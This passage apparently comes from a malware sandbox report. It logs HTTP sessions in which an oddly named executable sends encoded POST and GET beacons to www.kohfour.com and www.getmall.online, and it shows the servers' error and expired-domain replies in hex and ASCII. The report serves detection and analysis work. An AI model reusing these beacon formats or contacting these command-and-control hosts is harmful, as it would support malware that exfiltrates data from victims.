20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:36:03.248913050 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:36:03.248924017 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:36:03.248959064 CEST672INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:36:03.248971939 CEST1236INData Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                  May 27, 2024 12:36:03.248981953 CEST1236INData Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                  May 27, 2024 12:36:03.248995066 CEST1236INData Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engine.rb:524:in `call&#39;</a><br>
                                  May 27, 2024 12:36:03.249068022 CEST1236INData Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                  May 27, 2024 12:36:03.249203920 CEST328INData Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                  May 27, 2024 12:36:03.249264002 CEST1236INData Raw: 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69
                                  Data Ascii: ;</a><br><a class="trace-frames" data-frame-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middl
                                  May 27, 2024 12:36:03.256922960 CEST1236INData Raw: 65 73 27 29 3b 0a 20 20 20 20 76 61 72 20 73 65 6c 65 63 74 65 64 46 72 61 6d 65 2c 20 63 75 72 72 65 6e 74 53 6f 75 72 63 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 66 72 61 6d 65 2d 73 6f 75 72 63 65
                                  Data Ascii: es'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.749742216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:05.416882038 CEST1778OUTPOST /nsxv/ HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.kohfour.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.kohfour.com/nsxv/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 6b 61 47 70 53 65 75 58 56 71 6e 65 45 37 50 6f 6c 70 53 64 68 67 57 31 6e 4b 42 68 4e 50 32 66 79 70 57 58 58 79 78 49 37 2b 77 5a 73 78 6e 71 65 39 5a 56 6b 4c 47 66 68 42 43 31 48 69 6d 64 57 5a 76 54 7a 32 58 75 57 79 37 2f 55 30 33 45 38 39 39 31 2b 43 37 4e 52 43 5a 39 67 66 74 52 73 66 4d 4f 52 61 73 55 6e 55 50 5a 2f 58 70 53 71 66 32 65 2f 37 7a 6b 52 37 59 68 6d 58 35 31 56 46 2b 51 55 70 4b 41 49 79 2f 4f 4d 79 42 6b 43 57 63 7a 34 51 50 2f 41 30 61 45 73 75 2b 58 37 34 55 61 4d 56 4d 48 48 78 52 62 5a 4d 6b 59 47 6d 5a 53 73 75 70 31 6f 4e 6a 2f 6e 44 32 34 6d 6b 59 67 70 59 72 48 59 6a 58 54 46 35 39 43 70 56 4a 35 4b 56 53 45 49 4e 53 4d 42 39 34 64 4c 57 73 58 59 6a 70 50 78 4e 4b 4a 4c 49 6e 65 43 65 73 31 34 65 36 54 4e 65 6b 66 32 53 61 36 4a 73 4b 31 4c 69 36 6b 4b 62 76 54 58 78 69 69 32 41 32 77 50 39 36 2b 55 76 76 55 47 48 5a 66 36 61 48 6b 6d 71 77 56 57 45 37 33 34 61 68 45 43 52 63 39 52 46 31 69 73 45 2b 50 49 4f 74 54 44 46 6c 46 4c 49 4e 6a 53 36 36 70 6b 67 61 [TRUNCATED]
                                  Data Ascii: 4h=kaGpSeuXVqneE7PolpSdhgW1nKBhNP2fypWXXyxI7+wZsxnqe9ZVkLGfhBC1HimdWZvTz2XuWy7/U03E8991+C7NRCZ9gftRsfMORasUnUPZ/XpSqf2e/7zkR7YhmX51VF+QUpKAIy/OMyBkCWcz4QP/A0aEsu+X74UaMVMHHxRbZMkYGmZSsup1oNj/nD24mkYgpYrHYjXTF59CpVJ5KVSEINSMB94dLWsXYjpPxNKJLIneCes14e6TNekf2Sa6JsK1Li6kKbvTXxii2A2wP96+UvvUGHZf6aHkmqwVWE734ahECRc9RF1isE+PIOtTDFlFLINjS66pkgarvwACWuhcWJhF9MUkl+6BrLukJs1+X1vqbXAa9cp+2ey8psb2qDaUuYpXrZguY0l7WR7GMW2YqUNmbc/nvZ+Y7fDnd5Qzth9bGv/JWSsqSqLCOfIeUXsvIup6qSbSkt9ux2SyV7wIbfx/DRAXGr1Az/ABi+ARqSuR2r1/V71SrgyHriZR//4C3a6+gSSOFPdUcTFGX1ey8IBWW2z0S0nx3XKJTqFIUn8/DLB8HRoxj46ls0RDc0lxzc+Tz9UnoWvjLqb4pB7KPKZJMnxgEDBUKnCjhgOPzwf76wXT0CxXzTWuZi1K3SOC+7LPGQlzbGsEwaYBOJWmiyc6Xm2c0R6vQU7ua7L4TpAmc7X7af4SCI6fJzVWak7jMKmjgIdmrpCByti5vld85ewDrZG85VuhiayVDgxenEQOBRSsMhoiVNyVmlQwOi8Ft0G7g+eLTuOteZnq5fVb9QdmE6D6wiKwAmMdRcCCcUo6mriVD3I+TCN+r4P7CkDsMhW3VjireqexqAPxjPfeMNCU5PDIuEXxodmpWfjLOm4RLktFkudxuAIs8xZIwm/cCHMdAT1ACdOfb5lzy8dzzEzjF5YC0JfgtNYynSLTwC7XJgyL0eTFyNgwoj32KST4h48Wv2rg0DSNvo9PAQYfBR+EG+DEPSzBNnNJRMGwnTGX4 [TRUNCATED]
                                  May 27, 2024 12:36:05.968329906 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: fb8f3bc5-976b-429d-b4db-f4281f33cc3c
                                  x-runtime: 0.029723
                                  content-length: 19233
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 27, 2024 12:36:05.968462944 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 27, 2024 12:36:05.968473911 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 27, 2024 12:36:05.968486071 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 27, 2024 12:36:05.968496084 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 27, 2024 12:36:05.968513012 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 27, 2024 12:36:05.968518972 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 27, 2024 12:36:05.968529940 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 27, 2024 12:36:05.968547106 CEST1236INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 27, 2024 12:36:05.968559980 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 27, 2024 12:36:05.973478079 CEST672INData Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.749743216.40.34.41806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:08.188399076 CEST486OUTGET /nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.kohfour.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:36:08.679944038 CEST1236INHTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"bfcea5e971df5e9cceba933a2e06d12c"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: bc7030f2-685a-4eca-9e0b-5e287dadc778
                                  x-runtime: 0.003515
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Raw: 31 37 44 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                  Data Ascii: 17D9<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>kohfour.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired"><
                                  May 27, 2024 12:36:08.680013895 CEST1236INData Raw: 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63 32
                                  Data Ascii: img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>kohfour.com</h1><h2>has expired.</h2><div class='cta'><a class='btn' href='https://www
                                  May 27, 2024 12:36:08.680052042 CEST1236INData Raw: 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 65 6d
                                  Data Ascii: ired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofollow" href="https://
                                  May 27, 2024 12:36:08.680084944 CEST672INData Raw: 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38 2e 35 33 38 34 31 20 2d 36 2e 34 31 37 37 35 2c 2d 36 2e 38 33 38 37 39 20 2d 31 35 2e 35
                                  Data Ascii: .46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582
                                  May 27, 2024 12:36:08.680116892 CEST1236INData Raw: 34 33 37 39 36 20 2d 32 37 2e 32 31 33 36 36 2c 31 35 2e 30 36 33 33 35 20 2d 34 33 2e 36 39 39 36 35 2c 31 35 2e 30 36 33 33 35 20 2d 32 2e 38 34 30 31 34 2c 30 20 2d 35 2e 36 34 30 38 32 2c 2d 30 2e 31 36 37 32 32 20 2d 38 2e 33 39 33 34 39 2c
                                  Data Ascii: 43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.8
                                  May 27, 2024 12:36:08.680151939 CEST991INData Raw: 2e 35 20 31 38 2e 35 74 2d 31 30 33 20 31 30 74 2d 39 36 2e 35 20 33 74 2d 31 30 35 2e 35 20 30 74 2d 37 36 2e 35 20 2d 30 2e 35 7a 4d 31 35 33 36 20 36 34 30 71 30 20 2d 32 32 39 20 2d 35 20 2d 33 31 37 20 71 2d 31 30 20 2d 32 30 38 20 2d 31 32
                                  Data Ascii: .5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124t-124 322q-5 88 -5 317t5 317q10 208 124 322t322 124q88 5 317 5t317 -5q208 -10 322 -124t124 -322q5 -88 5 -3


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.749744203.161.43.228806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:36:14.813744068 CEST754OUTPOST /sdqf/ HTTP/1.1
                                  Host: www.getmall.online
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.getmall.online
                                  Connection: close
